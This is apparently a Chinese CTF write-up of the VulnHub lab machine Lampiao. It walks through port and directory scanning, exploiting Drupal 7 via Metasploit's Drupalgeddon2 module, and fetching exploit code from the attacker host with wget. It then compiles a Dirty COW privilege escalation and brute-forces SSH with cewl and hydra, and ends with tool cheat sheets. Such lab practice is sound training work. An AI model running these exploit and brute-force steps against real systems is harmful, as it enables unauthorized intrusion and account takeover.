VulnHub靶机2-Lampiao

信息收集

攻击机IP:

1
192.168.245.128

image-20210514152246103

主机发现

1
2
nmap -sP 192.168.245.0/24
主机IP:192.168.245.129

image-20210514152410051

端口扫描

1
nmap -sS -sV -A -T4 -p- 192.168.245.129

image-20210514153438234

发现开放了22、80、1898端口,访问80、1898是web服务

利用80、1898当做入口,进行网站信息收集

网站信息收集

image-20210514154255214

利用dirsearch扫描目录: dirsearch -u "http://192.168.245.129/" -e*

没有什么信息,是一个静态页面

image-20210514154025928

利用dirsearch扫描目录: dirsearch -u "http://192.168.245.129:1898/" -e*

image-20210514154221481

robots.txt

image-20210514154558106

同时发现网站框架为Drupal 版本为7.54

image-20210514154912938

漏洞利用

网上找一波Drupal 7版本的漏洞

参考:https://hackingprofessional.github.io/HTB/How-to-hack-a-website-that-uses-Drupal/

1
searchsploit drupal

image-20210514160315940

根据版本信息,利用7.x Module Services - Remote Code Execution

1
cp /usr/share/exploitdb/exploits/php/webapps/41564.php ./

发现exploit会用到/rest_endpoint 扫到的目录并不存在,访问404,利用dirb 扫描下:

1
dirb http://192.168.245.129:1898/ /usr/share/dirb/wordlists/common.txt -w

没有找到利用目录,换个exploit,exploit-db 发现2018-7600,直接上MSF

1
2
3
msfconsole
search drupal
use 4

image-20210514162549266

利用:

1
2
3
4
options
set rhosts 192.168.245.129
set rport 1898
run

image-20210514163101103

image-20210514163247098

可见攻击成功,拿到www-data的权限。

权限提升

拿到低权限的shell,接下来提权,采用最常用的内核漏洞提权。

1
python -c "import pty;pty.spawn('/bin/bash')"

创建一个tty:

查看Linux版本和内核版本:

image-20210514163938890

1
searchsploit Ubuntu 14.04.5

image-20210514164406377

利用第二个提权:

1
2
cp /usr/share/exploitdb/exploits/linux_x86/local/42276.c ./
python3 -m http.server 8000

复制到本地,然后python创建一个http服务用于下载exploit

1
2
3
4
cd /tmp
wget http://192.168.245.128:8000/42276.c
gcc -v //存在gcc 否则用cc
gcc 42276.c -o ./exp

image-20210514165609379

运行:

1
./exp

image-20210514165821480

提权失败。再尝试利用脏牛提权:

1
searchsploit dirty

image-20210514171004428

利用40847.cpp:

1
2
3
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ./
ls
python3 -m http.server 8000
1
2
3
4
wget http://192.168.245.128:8000/40847.cpp
ls
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
./40847

image-20210514171209263

得到root 密码,想到开放了22端口。ssh登录:

1
ssh root@192.168.245.129

image-20210514171346974

Get-Flag

image-20210514171440615

其他思路

大余师傅@的一个思路:

image-20210514171646466

可以进入:

image-20210514171722046

audio.m4a 是一段语音:user tiago 用户名为tiago

qrc.png 是一个二维码:Try harder! muahuahua

image-20210514172042162

接下来暴力破解SSH,用到两个工具cewlhydra

cewl:通过爬行网站获取关键信息创建一个密码字典

1
cewl http://192.168.245.129:1898/?q=node/1 -w vvv.txt

image-20210514172327958

1
hydra -l tiago -P vvv.txt 192.168.245.129 ssh

得到用户名、密码:

image-20210514172546836

1
2
tiago 
Virgulino

登录SSH:

1
ssh tiago@192.168.245.129

image-20210514172751414

普通用户,需要提权,思路同上。

思路总结

渗透的本质是信息收集!!!!!!!

dirb

dirb 工具:一个类似windows下御剑的目录扫描工具

常用参数:

-a 设置ua

-c 设置cookie带cookie扫描

-N 忽略某些响应码

-o 输出结果

-p 使用代理

-X 在每个测试目录上附加后缀

-z 设置毫秒延迟

1
2
3
4
dirb url dic.txt -X vvv //利用本地字典&设置附加后缀
dirb url dic.txt -a "ua" -c "cookie" //设置ua&cookie
dirb url dic.txt -p ip:port -o result.txt //设置代理&输出结果
dirb url dic.txt -z 1000 //设置延迟单位毫秒(1000=1秒)

cewl

cewl 通过爬行网站获取关键信息创建一个密码字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
cewl --debug //调试模式
cewl url //爬取网站,输出字典
cewl url -w dict.txt //字典写入dict.txt
cewl url -m 9 //设置最小长度为9的字典
cewl url -d 3 //设置爬取深度
cewl url -c //统计词的出现次数
cewl url -n -e //-e启用Email参数,-n隐藏工具在爬取网站过程中生成的密码字典
cewl -v //-v进入verbose模式,导出目标网站的详细数据
cewl --with-numbers //生成包含数字字符的字典

绕过认证:
–auth_type:Digest or basic.
–auth_user:Authentication username.
–auth_pass:Authentication password.
cewl url --auth_type Digest --auth_user admin--auth_pass password -v
cewl url --auth_type basic --auth_user admin--auth_pass password -v

设置代理:
cewl --proxy_host IP --proxy_port PORT -w dict.txt url
如果目标网站设置了代理服务器的话,Cewl将无法使用默认命令来生成字典,需要使用–proxy option选项来启用代理URL功能。